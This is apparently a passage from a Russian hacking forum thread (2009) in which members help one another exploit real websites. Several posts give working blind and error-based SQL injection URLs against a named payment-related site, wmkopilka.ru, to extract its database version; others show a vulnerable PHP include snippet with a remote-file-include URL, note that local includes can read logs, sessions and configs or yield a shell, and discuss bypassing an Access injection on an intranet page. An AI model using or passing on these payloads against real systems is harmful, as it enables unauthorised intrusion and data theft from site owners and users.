Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. gromoza

    gromoza Member

    Joined:
    21 Dec 2008
    Messages:
    7
    Likes Received:
    6
    Reputations:
    0
    Всем привет.
    Xttp://www.wmkopilka.ru/coinbox.php?5240'
    Кто что скажет? Два дня пытался крутить результата ноль
     
  2. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    Есть =)

    http://wmkopilka.ru/coinbox.php?5240'/**/and/**/substring((select/**/version()),1,1)=5/**/and/**/'1'='1
     
    7 people like this.
  3. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    2 ElteRUS:

    молоток, только можно и без select:

     
    2 people like this.
  4. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    А можно вообще без substring, т.к. мускуль конвертирует типы данных.
    Code:
    http://wmkopilka.ru/coinbox.php?5240'/**/and/**/version()=5/**/and/**/'1'='1
     
    1 person likes this.
  5. oRb

    oRb Elder - Старейшина

    Joined:
    9 May 2008
    Messages:
    294
    Likes Received:
    581
    Reputations:
    256
    А можно и вывод сделать:
    Code:
    http://wmkopilka.ru/coinbox.php?5240'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/'1'='1
    https://forum.antichat.ru/showpost.php?p=1494443&postcount=11
    Для кого человек старался? Почему не используете? ;)
     
    13 people like this.
  6. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,020
    Likes Received:
    128
    Reputations:
    23
    Этот код сохранить как php скрипт и запустить? и что узнаю? (т.е. что он делает)?

    Я вот хотел узнать к чему можно "подцепиться" :)) чтоб дальше узнать что делать.

    Нет так сказать "универсальные" трюки для уловки SQL инекци ?
     
    1 person likes this.
  7. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Умно:) 5*5/5 :)
     
  8. Ins3t

    Ins3t Харьковчанин

    Joined:
    18 Jul 2009
    Messages:
    939
    Likes Received:
    429
    Reputations:
    139
    Какой SQL inj ?
    Здесь базой данных то и не пахнет.
    У тебя есть инклайд.

    PHP:
    <?php
    if (isset($_GET['q'])){
    include(
    $_GET['q'].".php");
    }
    ?>
    ты получишь RFI (Remote File Include):

    site.com/script.php?q=http://site.net/file

    рузумееться при сообтетствующей конфигурации WEB сервера.

    А именно - для RFI должен быть включен allow_url_include в php.ini

    Так же можно юзать как и лфи.

    Советую почитать статью задохлика:
    http://forum.antichat.ru/thread23501.html
     
    #9848 Ins3t, 9 Nov 2009
    Last edited: 9 Nov 2009
    1 person likes this.
  9. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    на днях первый раз в жизни столкнулся со следующим адресом:
    www.site.com/default.php?show=100+and+ascii(lower(substring(version(),1,1)))=51
    Можете объяснить или дать что либо почитать, что, в какой версии и вообще где применяется
     
  10. Ins3t

    Ins3t Харьковчанин

    Joined:
    18 Jul 2009
    Messages:
    939
    Likes Received:
    429
    Reputations:
    139
    Кури Blind SQL inj

    http://forum.antichat.ru/thread19844.html
    Затем прочти пару статей от електа на тему реализации more1row инъецкий.
    Так же говорять что Qwazar очень хорошо описал какую то новую технотогию, точно не скажу, сам еще не читал эту статью.
     
    #9850 Ins3t, 9 Nov 2009
    Last edited: 9 Nov 2009
    1 person likes this.
  11. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    можеть кто знает в Jet database error

    на запрос:
    Code:
    =-1+order+by+5%00
    выдает:
    Code:
    Microsoft JET Database Engine error '80040e14' 
    The Microsoft Jet database engine does not recognize '6' as a valid field name or expression.
    а на:

    =-1+order+by+4%00

    страница открывается, но на нем тоже
    Code:
    Latest News
    
    
    Microsoft JET Database Engine error '80040e14' 
    The Microsoft Jet database engine does not recognize '4' as a valid field name or expression. 
    /intranet/inx/ecom_engine.asp, line 2462
    на запрос:
    Code:
    =-1+union+select+1,2,3,4%00
    Code:
    Microsoft JET Database Engine error '80004005' 
    
    Query input must contain at least one table or query. 
    
    /intranet/inx/ecom_engine.asp, line 2462
    как обойти? Правда ни одного названия таблиц не знаю.
    Может есть новые статьи по Jet database
     
  12. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Это Access. Статья:
    http://forum.antichat.ru/thread50550.html
     
    1 person likes this.
  13. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,020
    Likes Received:
    128
    Reputations:
    23
    Кстати, читаю про PHP inject (include), мне даже очень интересно кажется :)) спасибо за направление !
    Кстати, хотел узнать тенденцию этого уязвимости.. т.е. актино приниается, или редко встречается ? (по сравнение SQL инекции)
     
  14. [x60]unu

    [x60]unu Banned

    Joined:
    7 May 2009
    Messages:
    98
    Likes Received:
    498
    Reputations:
    163
    на 1 из предложенных багов месте по распространенности идет sql injection
    а потом и PHP injection
    вообще пхп иньекцию можно встретить часто)))
     
  15. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,020
    Likes Received:
    128
    Reputations:
    23
    [x60]unu

    это хорошо )) думаю php inject легче изучать, чем sql ))
    а еще такой ламерсий вопрос:
    - какие данные можно получить?
     
  16. Ins3t

    Ins3t Харьковчанин

    Joined:
    18 Jul 2009
    Messages:
    939
    Likes Received:
    429
    Reputations:
    139
    Через LFI можно инклудить логи, сессии, конфиги.
    С RFI думаю все ясно.
     
  17. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    142
    Likes Received:
    246
    Reputations:
    73
    В зависимости от ситуации в идеале можно получить шелл инклудом или выполнить любой код на системе.
     
  18. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,020
    Likes Received:
    128
    Reputations:
    23
    на сколько понял - о сливи БД тут речь не может идти.. это уже SQL инекцями, да?
    про LFI/RFI-уязвимости читал ЗДЕСЬ , но не очень понятно был что, зачем и как.. попробую еще искать ...
    спасибо за помощь.
     
  19. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    спс но я это много раз прочитал, я имел ввиду новые обходы по этому обстоятельству
     
  20. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    B1t.exe
    Давай ты всётаки не будешь засорять эту тему. Вот же твоя тема, она открыта:

    https://forum.antichat.ru/threadedpost1665798.html#post1665798

    тут рассматриваем конкретные уязвимости, сложности с ними, и т.д. Для твоих вопросов(и аналогичных) специально оставил ту тему

    YuNi|[c
    Обходы чего? Если ты читал статью, то должен был увидеть, что выборка в Access ОБЯЗАТЕЛЬНО должна быть из существующей таблицы. Ты это хочешь обойти что-ли? Или ты хочешь что-бы мы писали тебе варианты таблиц, а ты проверял? Линка-то нет.

    Сформулируй вопрос яснее
     
    #9860 Kakoytoxaker, 10 Nov 2009
    Last edited: 10 Nov 2009
Loading...
Thread Status:
Not open for further replies.